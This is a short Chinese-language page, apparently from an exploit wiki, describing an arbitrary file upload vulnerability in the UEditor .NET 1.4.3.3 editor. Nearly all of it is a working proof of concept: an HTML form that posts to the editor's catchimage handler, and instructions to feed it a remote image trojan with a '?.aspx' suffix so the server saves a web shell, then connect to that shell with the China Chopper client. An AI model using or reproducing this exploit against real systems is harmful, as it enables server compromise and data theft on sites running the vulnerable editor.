跳转至

Ueditor编辑器.NET1.4.3.3版本任意文件上传漏洞

漏洞影响:

.NET 1.4.3.3版本

漏洞POC:

<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]"/></p>
<input type="submit" value="submit"/>
</form>

保存为html文件,打开后上传框输入远程图片马test.jpg,上传时路径最后改为test.jpg?.aspx

返回shell路径菜刀连接即可!